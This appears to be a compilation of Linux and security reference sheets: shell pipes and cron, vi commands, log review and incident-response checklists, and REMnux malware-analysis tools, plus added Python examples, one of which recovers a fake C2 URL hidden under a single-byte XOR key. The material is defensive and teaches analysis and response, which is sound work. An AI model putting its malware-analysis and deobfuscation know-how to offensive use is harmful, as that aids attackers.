bob:x:1000:1000:Bob:/home/bob:/bin/bash
bobdjr:x:1001:1000:Robert Downey:/home/bobdjr:/bin/bash
bobh:x:1002:1000:Bob Hope:/home/bobh:/bin/bash
bobs:x:1003:1000:Bob Saget:/home/bobs:/bin/bash
bobd:x:1004:1000:Bob Dylan:/home/bobd:/bin/bash
bobb:x:1005:1000:Bob Barker:/home/bobb:/bin/bash
$ grep bob /etc/passwd | cut -f1,5 -d:
bob:Bob
bobdjr:Robert Downey
bobh:Bob Hope
bobs:Bob Saget
bobd:Bob Dylan
bobb:Bob Barker
$ grep bob /etc/passwd | cut -f1,5 -d: | sort
bob:Bob
bobb:Bob Barker
bobd:Bob Dylan
bobdjr:Robert Downey
bobh:Bob Hope
bobs:Bob Saget
$ grep bob /etc/passwd | cut -f1,5 -d: | sort | sed 's/:/ /'
bob Bob
bobb Bob Barker
bobd Bob Dylan
bobdjr Robert Downey
bobh Bob Hope
bobs Bob Saget
$ grep bob /etc/passwd | cut -f1,5 -d: | sort | sed 's/:/ /' | column -t
bob     Bob
bobb    Bob     Barker
bobd    Bob     Dylan
bobdjr  Robert  Downey
bobh    Bob     Hope
bobs    Bob     Saget

The above example shows the step-by-step thought process of how to go from one set of output and pipe it as the input to the next command. If you need to perform this action often you could save the final command for later use. As you can see, this simple concept of piping makes Linux extremely powerful.

Pipe Output to a Pager

Another common use of pipes is to control how output is displayed to your screen. If a command produces a significant amount of output it can scroll off your screen before you have the chance to examine it. To control the output use a pager utility such as more or less. You've already used those commands directly on files, but keep in mind they can take redirected input too.

$ grep bob /etc/passwd | less
bob:x:1000:1000:Bob:/home/bob:/bin/bash
bobdjr:x:1001:1000:Robert Downey:/home/bobdjr:/bin/bash
bobh:x:1002:1000:Bob Hope:/home/bobh:/bin/bash
bobb:x:1005:1000:Bob Barker:/home/bobb:/bin/bash
...
$ ls -l /usr/bin | less
total 62896
-rwxr-xr-x 1 root root 35264 Nov 19  2012 [
-rwxr-xr-x 1 root root    96 Sep 26 20:28 2to3-2.7
-rwxr-xr-x 1 root root    96 Sep 25 18:23 2to3-3.2
-rwxr-xr-x 1 root root 16224 Mar 18  2013 a2p
-rwxr-xr-x 1 root root 55336 Jul 12  2013 ab
...
$ ps -ef | more
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan08 ?        00:00:00 /sbin/init
root         2     0  0 Jan08 ?        00:00:00 [kthreadd]
root         3     2  0 Jan08 ?        00:00:01 [ksoftirqd/0]
root         6     2  0 Jan08 ?        00:00:00 [migration/0]
root         7     2  0 Jan08 ?        00:00:04 [watchdog/0]
...
$

http://www.LinuxTrainingAcademy.com



Scheduling Repeated Jobs with Cron

If you need to repeat a task on a schedule, you can use the cron service. Every minute the cron service checks to see if there are any scheduled jobs to run and if so runs them. Cron jobs are often used to automate a process or perform routine maintenance. You can schedule cron jobs by using the crontab command.

cron - A time based job scheduling service. This service is typically started when the system boots.

crontab - A program to create, read, update, and delete your job schedules.

A crontab (cron table) is a configuration file that specifies when commands are to be executed by cron. Each line in a crontab represents a job and contains two pieces of information: 1) when to run and 2) what to run. The time specification consists of five fields. They are minutes, hour, day of the month, month, and day of the week. After the time specification you provide the command to be executed.

Crontab Format

* * * * * command
| | | | |
| | | | +-- Day of the Week (0-6)
| | | +---- Month of the Year (1-12)
| | +------ Day of the Month (1-31)
| +-------- Hour (0-23)
+---------- Minute (0-59)

The command will only be executed when all of the time specification fields match the current date and time. You can specify that a command be run only once, but this is not the typical use case for cron. Typically, one or more of the time specification fields will contain an asterisk (*) which matches any time or date for that field. Here is an example crontab.

# Run every Monday at 07:00.
0 7 * * 1 /opt/sales/bin/weekly-report

Here is a graphical representation of the above crontab entry.

0 7 * * 1 /opt/sales/bin/weekly-report
| | | | |
| | | | +-- Day of the Week (0-6)
| | | +---- Month of the Year (1-12)
| | +------ Day of the Month (1-31)
| +-------- Hour (0-23)
+---------- Minute (0-59)

This job will run only when the minute is 0, the hour is 7, and the day of the week is 1. In the day of the week field 0 represents Sunday, 1 Monday, etc. This job will run on any day and during any month since the asterisk was used for those two fields.

If any output is generated by the command it is mailed to you. You can check your local mail with the mail command. If you would prefer not to get email you can redirect the output of the command as in this example.

# Run at 02:00 every day and send output to a log file.
0 2 * * * /opt/acme/bin/backup-db > /var/opt/acme/backup-db.log 2>&1



You can provide multiple values for each of the fields. If you would like to run a command every half-hour, you could do this.

# Run every 30 minutes.
0,30 * * * * /opt/acme/bin/half-hour-check

# Another way to do the same thing.
*/30 * * * * /opt/acme/bin/half-hour-check

Instead of using 0,30 for the minute field you could have used */30, which means "every 30th minute" (a step of 30 starting from 0). Note that */2 would be wrong here: it matches every even minute, so the job would run thirty times an hour instead of twice. You can even use ranges with a dash. If you want to run a job every minute for the first four minutes of the hour you can use this time specification: 0-4 * * * * command.

There are several implementations of the cron scheduler and some allow you to use shortcuts and keywords in your crontabs. Common keywords have been provided below, but refer to the documentation for cron on your system to ensure these will work.

Keyword      Description                                                          Equivalent
@yearly      Run once a year at midnight in the morning of January 1              0 0 1 1 *
@annually    Same as @yearly                                                      0 0 1 1 *
@monthly     Run once a month at midnight in the morning of the first day of the month   0 0 1 * *
@weekly      Run once a week at midnight in the morning of Sunday                 0 0 * * 0
@daily       Run once a day at midnight                                           0 0 * * *
@midnight    Same as @daily                                                       0 0 * * *
@hourly      Run once an hour at the beginning of the hour                        0 * * * *
@reboot      Run at startup                                                       N/A

Using the Crontab Command

Use the crontab command to manipulate cron jobs.

crontab file - Install a new crontab from file.

crontab -l - List your cron jobs.

crontab -e - Edit your cron jobs.

crontab -r - Remove all of your cron jobs.

$ crontab -l
no crontab for bob
$ cat my-cron
# Run every Monday at 07:00.
0 7 * * 1 /opt/sales/bin/weekly-report
$ crontab my-cron
$ crontab -l
# Run every Monday at 07:00.
0 7 * * 1 /opt/sales/bin/weekly-report
$ crontab -e
# $EDITOR is invoked.
$ crontab -r
$ crontab -l
no crontab for bob
$
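Before installing a schedule it is worth checking what the five fields actually match, since a typo such as */2 for */30 silently changes how often a job runs. The following is an added example written for this page (it is not the cron daemon's code and is not from the original text): a small evaluator of the five-field time specification, including the list, range, step and @keyword forms described above. The job names in the sample lines are the ones used on this page; the helper names (expand_field, fires_on, firing_minutes) are this example's own.

```python
"""Evaluate the five-field crontab time specification described above.

Added example (not from the original text): it parses the minute, hour,
day-of-month, month and day-of-week fields, expands lists ("0,30"),
ranges ("0-4") and steps ("*/30"), and reports whether a job fires at a
given wall-clock time. It illustrates cron's matching rules; it is not
the cron daemon's own implementation.
"""
from datetime import datetime

# Field order and inclusive limits, as in the crontab format diagram.
FIELD_LIMITS = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 6)]

# Shortcut keywords and their five-field equivalents (@reboot has none).
KEYWORDS = {
    "@yearly": "0 0 1 1 *", "@annually": "0 0 1 1 *",
    "@monthly": "0 0 1 * *", "@weekly": "0 0 * * 0",
    "@daily": "0 0 * * *", "@midnight": "0 0 * * *",
    "@hourly": "0 * * * *",
}


def expand_field(spec, lo, hi):
    """Return the set of integer values a single crontab field matches."""
    values = set()
    for part in spec.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            start_text, end_text = part.split("-", 1)
            start, end = int(start_text), int(end_text)
        else:
            start = end = int(part)
            if step != 1:          # "5/15" is treated as "5-59/15"
                end = hi
        if not (lo <= start <= end <= hi):
            raise ValueError(f"field {spec!r} out of range {lo}-{hi}")
        values.update(range(start, end + 1, step))
    return values


def parse_schedule(line):
    """Split a crontab line into five value sets and the command string."""
    line = line.strip()
    if line.startswith("@"):
        keyword, _, command = line.partition(" ")
        if keyword == "@reboot":
            raise ValueError("@reboot is not a time specification")
        line = KEYWORDS[keyword] + " " + command
    parts = line.split(None, 5)
    if len(parts) < 6:
        raise ValueError("expected five time fields and a command")
    fields = [expand_field(spec, lo, hi)
              for spec, (lo, hi) in zip(parts[:5], FIELD_LIMITS)]
    return fields, parts[5]


def fires_at(line, when):
    """True if every field matches `when` (cron's day-of-week: 0 = Sunday)."""
    fields, _ = parse_schedule(line)
    dow = (when.weekday() + 1) % 7      # Python: Monday=0 -> cron: Sunday=0
    actual = [when.minute, when.hour, when.day, when.month, dow]
    return all(value in allowed for value, allowed in zip(actual, fields))


def fires_on(line, year, month, day, hour, minute):
    """Convenience wrapper taking plain integers instead of a datetime."""
    return fires_at(line, datetime(year, month, day, hour, minute))


def firing_minutes(line, hour=0):
    """Sorted minutes within one hour at which the job runs on 1 Jan 2024 (a Monday)."""
    return sorted(m for m in range(60)
                  if fires_at(line, datetime(2024, 1, 1, hour, m)))


if __name__ == "__main__":
    for spec in ("0,30 * * * * /opt/acme/bin/half-hour-check",
                 "*/30 * * * * /opt/acme/bin/half-hour-check",
                 "*/2 * * * * /opt/acme/bin/half-hour-check",
                 "0-4 * * * * command"):
        print(f"{spec:45s} -> minutes {firing_minutes(spec)}")
```

Running it shows 0,30 and */30 firing at minutes 0 and 30, */2 firing thirty times an hour, and 0-4 firing at minutes 0 through 4; the weekly report line matches Monday 07:00 and nothing else.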



VI "Cheat" Sheet
ACNS Bulletin ED-03

February 1995

vi Editor "Cheat Sheet"

Invoking vi: vi filename

Format of vi commands: [count][command] (count repeats the effect of the command)

File management commands

:w name   Write edit buffer to file name
:wq       Write to file and quit
:q!       Quit without saving changes
ZZ        Same as :wq
:sh       Execute shell commands (<ctrl>d)

Window motions

<ctrl>d   Scroll down (half a screen)
<ctrl>u   Scroll up (half a screen)
<ctrl>f   Page forward
<ctrl>b   Page backward
/string   Search forward
?string   Search backward
<ctrl>l   Redraw screen
<ctrl>g   Display current line number and file information
n         Repeat search
N         Repeat search reverse
G         Go to last line
nG        Go to line n
:n        Go to line n
z<CR>     Reposition window: cursor at top
z.        Reposition window: cursor in middle
z-        Reposition window: cursor at bottom

Cursor motions

H   Upper left corner (home)
M   Middle line
L   Lower left corner
h   Back a character
j   Down a line
k   Up a line
^   Beginning of line
$   End of line
l   Forward a character
w   One word forward
b   Back one word
fc  Find c
;   Repeat find (find next c)

Command mode versus input mode

Vi starts in command mode. The positioning commands operate only while vi is in command mode. You switch vi to input mode by entering any one of several vi input commands. (See next section.) Once in input mode, any character you type is taken to be text and is added to the file. You cannot execute any commands until you exit input mode. To exit input mode, press the escape (Esc) key.

Input commands (end with Esc)

a        Append after cursor
i        Insert before cursor
o        Open line below
O        Open line above
:r file  Insert file after current line

Any of these commands leaves vi in input mode until you press Esc. Pressing the RETURN key will not take you out of input mode.

Change commands (Input mode)

cw  Change word (Esc)
cc  Change line (Esc) - blanks line
c$  Change to end of line
rc  Replace character with c
R   Replace (Esc) - typeover
s   Substitute (Esc) - 1 char with string
S   Substitute (Esc) - Rest of line with text
.   Repeat last change

Changes during insert mode

<ctrl>h  Back one character
<ctrl>w  Back one word
<ctrl>u  Back to beginning of insert



Deletion commands

dd or ndd  Delete n lines to general buffer
dw         Delete word to general buffer
dnw        Delete n words
d)         Delete to end of sentence
db         Delete previous word
D          Delete to end of line
x          Delete character

Recovering deletions

p  Put general buffer after cursor
P  Put general buffer before cursor

Undo commands

u  Undo last change
U  Undo all changes on line

Rearrangement commands

yy or Y  Yank (copy) line to general buffer
"z6yy    Yank 6 lines to buffer z
yw       Yank word to general buffer
"a9dd    Delete 9 lines to buffer a
"A9dd    Delete 9 lines; Append to buffer a
"ap      Put text from buffer a after cursor
p        Put general buffer after cursor
P        Put general buffer before cursor
J        Join lines

Parameters

:set list          Show invisible characters
:set nolist        Don't show invisible characters
:set number        Show line numbers
:set nonumber      Don't show line numbers
:set autoindent    Indent after carriage return
:set noautoindent  Turn off autoindent
:set showmatch     Show matching sets of parentheses as they are typed
:set noshowmatch   Turn off showmatch
:set showmode      Display mode on last line of screen
:set noshowmode    Turn off showmode
:set all           Show values of all possible parameters

Move text from file old to file new

vi old
"a10yy       yank 10 lines to buffer a
:w           write work buffer
:e new       edit new file
"ap          put text from a after cursor
:30,60w new  Write lines 30 to 60 in file new

Regular expressions (search strings)

^   Matches beginning of line
$   Matches end of line
.   Matches any single character
*   Matches zero or more of the previous character
.*  Matches any string of characters (including an empty one)

Search and replace commands

Syntax:

:[address]s/old_text/new_text/

Address components:

.                Current line
n                Line number n
.+m              Current line plus m lines
$                Last line
/string/         A line that contains "string"
%                Entire file
[addr1],[addr2]  Specifies a range

Examples:

The following example replaces only the first occurrence of Banana with Kumquat in each of 11 lines starting with the current line (.) and continuing for the 10 that follow (.+10).

:.,.+10s/Banana/Kumquat

The following example replaces every occurrence (caused by the g at the end of the command) of apple with pear.

:%s/apple/pear/g

The following example removes the last character from every line in the file. Use it if every line in the file ends with ^M as the result of a file transfer. Execute it when the cursor is on the first line of the file.

:%s/.$//



CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS

This cheat sheet presents a checklist for reviewing critical logs when responding to a security incident. It can also be used for routine log review.

General Approach

1. Identify which log sources and automated tools you can use during the analysis.
2. Copy log records to a single location where you will be able to review them.
3. Minimize "noise" by removing routine, repetitive log entries from view after confirming that they are benign.
4. Determine whether you can rely on logs' time stamps; consider time zone differences.
5. Focus on recent changes, failures, errors, status changes, access and administration events, and other events unusual for your environment.
6. Go backwards in time from now to reconstruct actions after and before the incident.
7. Correlate activities across different logs to get a comprehensive picture.
8. Develop theories about what occurred; explore logs to confirm or disprove them.

Potential Security Log Sources

- Server and workstation operating system logs
- Application logs (e.g., web server, database server)
- Security tool logs (e.g., anti-virus, change detection, intrusion detection/prevention system)
- Outbound proxy logs and end-user application logs
- Remember to consider other, non-log sources for security events.

Typical Log Locations

- Linux OS and core applications: /var/log
- Windows OS and core applications: Windows Event Log (Security, System, Application)
- Network devices: usually logged via Syslog; some use proprietary locations and formats

What to Look for on Linux

- Successful user login: "Accepted password", "Accepted publickey", "session opened"
- Failed user login: "authentication failure", "failed password"
- User log-off: "session closed"
- User account change or deletion: "password changed", "new user", "delete user"
- Sudo actions: "sudo: … COMMAND=…", "FAILED su"
- Service failure: "failed" or "failure"

What to Look for on Windows

Event IDs are listed below for Windows 2000/XP. For Vista/7 security event ID, add 4096 to the event ID. Most of the events below are in the Security log; many are only logged on the domain controller.

- User logon/logoff events: Successful logon 528, 540; failed logon 529-537, 539; logoff 538, 551, etc.
- User account changes: Created 624; enabled 626; changed 642; disabled 629; deleted 630
- Password changes: To self: 628; to others: 627
- Service started or stopped: 7035, 7036, etc.
- Object access denied (if auditing enabled): 560, 567, etc.

What to Look for on Network Devices

Look at both inbound and outbound activities. Examples below show log excerpts from Cisco ASA logs; other devices have similar functionality.

- Traffic allowed on firewall: "Built … connection", "access-list … permitted"
- Traffic blocked on firewall: "access-list … denied", "deny inbound"; "Deny … by"
- Bytes transferred (large files?): "Teardown TCP connection … duration … bytes …"
- Bandwidth and protocol usage: "limit … exceeded", "CPU utilization"
- Detected attack activity: "attack from"
- User account changes: "user added", "user deleted", "User priv level changed"
- Administrator access: "AAA user …", "User … locked out", "login failed"

What to Look for on Web Servers

- Excessive access attempts to non-existent files
- Code (SQL, HTML) seen as part of the URL
- Access to extensions you have not implemented
- Web service stopped/started/failed messages
- Access to "risky" pages that accept user input
- Look at logs on all servers in the load balancer pool
- Error code 200 on files that are not yours
- Failed user authentication: Error code 401, 403
- Invalid request: Error code 400
- Internal server error: Error code 500

Other Resources

- Windows event ID lookup: www.eventid.net
- A listing of many Windows Security Log events: ultimatewindowssecurity.com/.../Default.aspx
- Log analysis references: www.loganalysis.org
- A list of open-source log analysis tools: securitywarriorconsulting.com/logtools
- Anton Chuvakin's log management blog: securitywarriorconsulting.com/logmanagementblog
- Other security incident response-related cheat sheets: zeltser.com/cheat-sheets

Authored by Anton Chuvakin (chuvakin.org) and Lenny Zeltser (zeltser.com). Reviewed by Anand Sastry. Distributed according to the Creative Commons v3 Attribution License. Cheat sheet version 1.0.
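The "What to Look for on Linux" and "What to Look for on Windows" items above are string and event-ID indicators, so they can be applied mechanically once logs have been copied to one place (step 2 of the general approach). The following added example, which is not part of the checklist and not the authors' code, turns those indicators into a small review script: it tallies the Linux message fragments over a block of syslog-style lines and maps the Windows 2000/XP Security event IDs to their Vista/7 form by adding 4096, as the checklist instructs. The log lines are constructed for the demonstration, and the category names and helper functions are this example's own.

```python
"""Apply the Linux and Windows indicators from the checklist above to sample data.

Added example, not part of the original cheat sheet: the log lines below are
constructed for illustration, and the category names are this example's own.
"""
import re
from collections import Counter

# Message fragments from the Linux section, mapped to a review category.
# Patterns are matched case-insensitively against the full log line.
LINUX_INDICATORS = [
    ("successful login", r"Accepted (password|publickey)|session opened"),
    ("failed login",     r"authentication failure|Failed password"),
    ("logoff",           r"session closed"),
    ("account change",   r"password changed|new user|delete user"),
    ("sudo action",      r"sudo: .*COMMAND=|FAILED su"),
    ("service failure",  r"\bfail(ed|ure)\b"),   # deliberately broad, as on the checklist
]

# Windows 2000/XP Security log IDs from the checklist; Vista/7 IDs are +4096.
WINDOWS_XP_IDS = {
    "successful logon": [528, 540],
    "failed logon": list(range(529, 538)) + [539],
    "logoff": [538, 551],
    "account created": [624], "account enabled": [626],
    "account changed": [642], "account disabled": [629],
    "account deleted": [630],
    "password change (self)": [628], "password change (others)": [627],
    "object access denied": [560, 567],
}

# Constructed sample of syslog-style auth lines (not real captured data).
SAMPLE_AUTH_LOG = """\
Jan 12 09:14:02 web1 sshd[2211]: Accepted password for bob from 10.0.0.5 port 51022 ssh2
Jan 12 09:14:02 web1 sshd[2211]: pam_unix(sshd:session): session opened for user bob by (uid=0)
Jan 12 09:16:40 web1 sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/id
Jan 12 09:17:11 web1 sshd[2290]: Failed password for invalid user admin from 198.51.100.7 port 40011 ssh2
Jan 12 09:17:13 web1 sshd[2290]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.51.100.7
Jan 12 09:20:00 web1 useradd[2310]: new user: name=backup2, UID=1007, GID=1007, home=/home/backup2, shell=/bin/bash
Jan 12 09:21:30 web1 su: FAILED su for root by bob
Jan 12 09:25:00 web1 systemd[1]: cron.service: Failed with result 'exit-code'.
Jan 12 09:30:45 web1 sshd[2211]: pam_unix(sshd:session): session closed for user bob
"""


def classify_line(line):
    """Return the categories (in checklist order) whose indicator matches this line."""
    return [name for name, pattern in LINUX_INDICATORS
            if re.search(pattern, line, re.IGNORECASE)]


def review_linux_log(text):
    """Tally indicator hits across a block of log text; returns a Counter."""
    hits = Counter()
    for line in text.splitlines():
        for category in classify_line(line):
            hits[category] += 1
    return hits


def windows_event_id(xp_id, vista_or_later=True):
    """Translate a Windows 2000/XP Security event ID to its Vista/7 equivalent."""
    return xp_id + 4096 if vista_or_later else xp_id


def windows_categories_for(event_id):
    """Name the checklist categories an event ID (XP or Vista/7 form) belongs to."""
    xp_id = event_id - 4096 if event_id >= 4096 else event_id
    return [name for name, ids in WINDOWS_XP_IDS.items() if xp_id in ids]


if __name__ == "__main__":
    for line in SAMPLE_AUTH_LOG.splitlines():
        print(f"{classify_line(line) or ['-']}: {line[:70]}")
    print(review_linux_log(SAMPLE_AUTH_LOG))
    print(windows_event_id(528), windows_categories_for(4625))
```

Note that the checklist's generic "failed"/"failure" indicator also fires on the failed-login and FAILED su lines, so those lines land in two categories; that overlap is the "noise" step 3 of the general approach tells you to prune once you have confirmed which hits are benign.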



INITIAL SECURITY INCIDENT QUESTIONNAIRE FOR RESPONDERS

Tips for assisting incident handlers in assessing the situation when responding to a qualified incident.

Understand the Incident's Background

- What is the nature of the problem, as it has been observed so far?
- How was the problem initially detected? When was it detected and by whom?
- What security infrastructure components exist in the affected environment? (e.g., firewall, anti-virus, etc.)
- What is the security posture of the affected IT infrastructure components? How recently, if ever, was it assessed for vulnerabilities?
- What groups or organizations were affected by the incident? Are they aware of the incident?
- Were other security incidents observed on the affected environment or the organization recently?

Define Communication Parameters

- Which individuals are aware of the incident? What are their names and group or company affiliations?
- Who is designated as the primary incident response coordinator?
- Who is authorized to make business decisions regarding the affected operations? (This is often an executive.)
- What mechanisms will the team use to communicate when handling the incident? (e.g., email, phone conference, etc.) What encryption capabilities should be used?
- What is the schedule of internal regular progress updates? Who is responsible for them?
- What is the schedule of external regular progress updates? Who is responsible for leading them?
- Who will conduct "in the field" examination of the affected IT infrastructure? Note their name, title, phone (mobile and office), and email details.
- Who will interface with legal, executive, public relations, and other relevant internal teams?

Assess the Incident's Scope

- What IT infrastructure components (servers, websites, networks, etc.) are directly affected by the incident?
- What applications and data processes make use of the affected IT infrastructure components?
- Are we aware of compliance or legal obligations tied to the incident? (e.g., PCI, breach notification laws, etc.)
- What are the possible ingress and egress points for the affected environment?
- What theories exist for how the initial compromise occurred?
- Does the affected IT infrastructure pose any risk to other organizations?

Review the Initial Incident Survey's Results

- What analysis actions were taken during the initial survey when qualifying the incident?
- What commands or tools were executed on the affected systems as part of the initial survey?
- What measures were taken to contain the scope of the incident? (e.g., disconnected from the network)
- What alerts were generated by the existing security infrastructure components? (e.g., IDS, anti-virus, etc.)
- If logs were reviewed, what suspicious entries were found? What additional suspicious events or state information was observed?

Prepare for Next Incident Response Steps

- Does the affected group or organization have specific incident response instructions or guidelines?
- Does the affected group or organization wish to proceed with live analysis, or does it wish to start formal forensic examination?
- What tools are available to us for monitoring network or host-based activities in the affected environment?
- What mechanisms exist to transfer files to and from the affected IT infrastructure components during the analysis? (e.g., network, USB, CD-ROM, etc.)
- Where are the affected IT infrastructure components physically located?
- What backup-restore capabilities are in place to assist in recovering from the incident?
- What are the next steps for responding to this incident? (Who will do what and when?)

Key Incident Response Steps

1. Preparation: Gather and learn the necessary tools, become familiar with your environment.
2. Identification: Detect the incident, determine its scope, and involve the appropriate parties.
3. Containment: Contain the incident to minimize its effect on neighboring IT resources.
4. Eradication: Eliminate compromise artifacts, if necessary, on the path to recovery.
5. Recovery: Restore the system to normal operations, possibly via reinstall or backup.
6. Wrap-up: Document the incident's details, retain collected data, and discuss lessons learned.

Additional Incident Response References

- Incident Survey Cheat Sheet for Server Administrators: http://zeltser.com/network-os-security/security-incident-survey-cheat-sheet.htm
- Windows Intrusion Discovery Cheat Sheet: http://sans.org/resources/winsacheatsheet.pdf
- Checking Windows for Signs of Compromise: http://www.ucl.ac.uk/cert/win_intrusion.pdf
- Linux Intrusion Discovery Cheat Sheet: http://sans.org/resources/linsacheatsheet.pdf
- Checking Unix/Linux for Signs of Compromise: http://www.ucl.ac.uk/cert/nix_intrusion.pdf

Authored by Lenny Zeltser, who leads a security consulting team at SAVVIS, and teaches malware analysis at SANS Institute. Special thanks for feedback to Jack McCarthy and Patrick Nolan. Creative Commons v3 "Attribution" License for this cheat sheet v. 1.2. More cheat sheets?



REMNUX USAGE TIPS FOR MALWARE ANALYSIS ON LINUX

This cheat sheet outlines the tools and commands for analyzing malicious software on the REMnux Linux distro.

Getting Started with REMnux

- Download REMnux as a virtual appliance or install the distro on an existing compatible system, such as SIFT.
- Log into the REMnux virtual appliance as the user remnux, default password malware. Use apt-get to install additional software packages if your system is connected to the Internet.
- Run the update-remnux command to upgrade REMnux and update its software.
- Switch keyboard layout by clicking the keyboard icon in the bottom right corner of the REMnux desktop.
- On VMware, install VMware Tools using install-vmware-tools to adjust the screen size.

General Commands on REMnux

- Shut down the system: shutdown
- Reboot the system: reboot
- Switch to a root shell: sudo -s
- Renew DHCP lease: renew-dhcp
- See current IP address: myip
- Edit a text file: scite file
- View an image file: feh file
- Start web server: httpd start
- Start SSH server: sshd start

Statically Examine Files

- Inspect file properties using pescanner, pestr, pyew, readpe, pedump, peframe, signsrch, readpe.py.
- Investigate binary files in-depth using bokken, vivbin, udcli, RATDecoders, radare2, yara, wxHexEditor.
- Deobfuscate contents with xorsearch, unxor.py, Balbuzard, NoMoreXOR.py, brutexor.py, xortool.
- Examine memory snapshots using Rekall, Volatility.
- Assess packed files using densityscout, bytehist, packerid, upx.
- Extract and carve file contents using hachoir-subfile, bulk_extractor, scalpel, foremost.
- Scan files for malware signatures using clamscan after refreshing signatures with freshclam.
- Examine and track multiple malware samples with mas, viper, maltrieve, Ragpicker.
- Work with file hashes using nsrllookup, Automater, hash_id, ssdeep, totalhash, virustotal-search, vt.
- Define signatures with yaraGenerator.py, autorule.py, IOCextractor.py, rule-editor.

Handle Network Interactions

- Analyze network traffic with wireshark, ngrep, tcpick, tcpxtract, tcpflow, tcpdump.
- Intercept all laboratory traffic destined for IP addresses using accept-all-ips.
- Analyze web traffic with burpsuite, mitmproxy, CapTipper, NetworkMiner.
- Implement common network services using fakedns, fakesmtp, inetsim, ircd start, httpd start.

Examine Browser Malware

- Deobfuscate JavaScript with SpiderMonkey (js), d8, rhino-debugger and Firebug.
- Define JavaScript objects for SpiderMonkey using /usr/share/remnux/objects.js.
- Clean up JavaScript with js-beautify.
- Retrieve web pages with wget and curl.
- Examine malicious Flash files with swfdump, flare, RABCDAsm, xxxswf.py, extract_swf.
- Analyze Java malware using idx_parser.py, cfr, jad, jd-gui, Javassist.
- Inspect malicious websites and domains using thug, Automater, pdnstool.py, passive.py.

Examine Document Files

- Analyze suspicious Microsoft Office documents with officeparser.py, oletools, libolecf, oledump.py.
- Examine PDFs using pdfid, pdfwalker, pdf-parser, pdfdecompress, pdfxray_lite, pyew, peepdf.
- Extract JavaScript or SWFs from PDFs using pdfextract, pdf.py and swf_mastah.
- Examine shellcode using shellcode2exe.py, sctest, dism-this, unicode2hex-escaped, m2elf, dism-this.py.

Investigate Linux Malware

- Disassemble and debug binaries using bokken, vivbin, edb, gdb, udcli, radare2, objdump.
- Examine the system during behavioral analysis with sysdig, unhide, strace, ltrace.
- Examine memory snapshots using Rekall, Volatility.
- Decode Android malware using Androwarn, AndroGuard.

Examine Memory Using Volatility

- Determine profile: kdbgscan, imageinfo
- Spot hidden processes: psxview
- List all processes: pslist, psscan
- Show a registry key: printkey -K key
- Extract process image: procdump
- Extract process memory: memdump, vaddump
- List open handles, files, DLLs and mutant objects: handles, filescan, dlllist, mutantscan
- List services, drivers and kernel modules: svcscan, driverscan, modules, modscan
- View network activities: connscan, connections, sockets, sockscan, netscan
- View activity timeline: timeliner, evtlogs
- Find and extract malware: malfind, apihooks

Additional Resources

- REMnux Documentation
- Reverse-Engineering Malware Cheat Sheet
- Analyzing Malicious Documents Cheat Sheet
- SANS Reverse-Engineering Malware Course

Authored by Lenny Zeltser for REMnux v6. Lenny writes a security blog at zeltser.com and is active on Twitter as @lennyzeltser. Many REMnux tools and techniques are discussed in the Reverse-Engineering Malware (REM) course, which Lenny teaches at SANS Institute; see LearnREM.com. This cheat sheet is distributed according to the Creative Commons v3 Attribution License.
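Several of the "Deobfuscate contents" tools listed above (xorsearch, brutexor.py, unxor.py) share one idea: a sample that hides its strings under a single-byte XOR key can be cracked by trying all 256 keys and looking for a plaintext you expect, such as "http" or "This program". The following added example (written for this page; it is not the code of any REMnux tool and not from the cheat sheet) reimplements that known-plaintext search. The blob it scans is constructed here, with a C2 URL and a PDB path XORed under key 0x5A, and all function names are this example's own.

```python
"""Single-byte XOR key recovery by known-plaintext search.

Added example (not REMnux's own code): it reimplements, in a few lines, the
core idea behind xorsearch / brutexor.py listed above. Malware often hides
strings such as "http://" or "This program" under a one-byte XOR key; trying
all 256 keys and looking for the expected plaintext recovers both the key and
the string's offset. The sample blob below is constructed here for the demo.
"""


def xor_bytes(data, key):
    """XOR every byte of `data` with the single-byte `key`."""
    return bytes(b ^ key for b in data)


def xor_search(data, needle, keys=range(256)):
    """Find (key, offset) pairs where data ^ key contains `needle`.

    The search XORs the needle instead of the whole buffer, so each key costs
    one substring search rather than a full decode of the file.
    """
    hits = []
    for key in keys:
        encoded_needle = xor_bytes(needle, key)   # how `needle` looks under this key
        start = 0
        while True:
            offset = data.find(encoded_needle, start)
            if offset < 0:
                break
            hits.append((key, offset))
            start = offset + 1
    return hits


def decoded_string_at(data, key, offset, max_len=80):
    """Decode from `offset` with `key` up to the first NUL or `max_len` bytes."""
    plain = xor_bytes(data[offset:offset + max_len], key)
    end = plain.find(b"\x00")
    return plain if end < 0 else plain[:end]


# Constructed sample: a fake header and filler, then a C2 URL and a PDB path
# hidden under key 0x5A, then padding. Nothing here is a real sample.
_SECRET = b"http://198.51.100.23/gate.php\x00C:\\build\\dropper.pdb\x00"
SAMPLE_BLOB = (b"MZ\x90\x00" + bytes(range(0x10, 0x40))
               + xor_bytes(_SECRET, 0x5A) + b"\xCC" * 16)


def find_hidden_urls(blob):
    """Return (key, offset, decoded text) for every 'http' hit under a non-zero key.

    Key 0 is skipped on purpose: a real file may contain the plaintext needle
    legitimately, and key 0 would just report those occurrences.
    """
    results = []
    for key, offset in xor_search(blob, b"http", keys=range(1, 256)):
        text = decoded_string_at(blob, key, offset).decode("ascii", "replace")
        results.append((key, offset, text))
    return results


if __name__ == "__main__":
    for key, offset, text in find_hidden_urls(SAMPLE_BLOB):
        print(f"key=0x{key:02x} offset={offset} -> {text}")
```

On the constructed blob this reports key 0x5A at offset 52 and decodes the URL; decoding from the byte after the URL's NUL with the same key yields the PDB path, which is the usual next step once one key is known. Multi-byte or rolling keys need xortool-style key-length analysis, which this example does not attempt.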



REVERSE-ENGINEERING MALWARE

The shortcuts and tips behind this cheat sheet are covered in Lenny Zeltser's SANS Institute course SEC610: Reverse-Engineering Malware; for details see http://zeltser.com/reverse-malware.

General Approach

1. Set up a controlled, isolated laboratory in which to examine the malware specimen.
2. Perform behavioral analysis to examine the specimen's interactions with its environment.
3. Perform static code analysis to further understand the specimen's inner workings.
4. Perform dynamic code analysis to understand the more difficult aspects of the code.
5. If necessary, unpack the specimen.
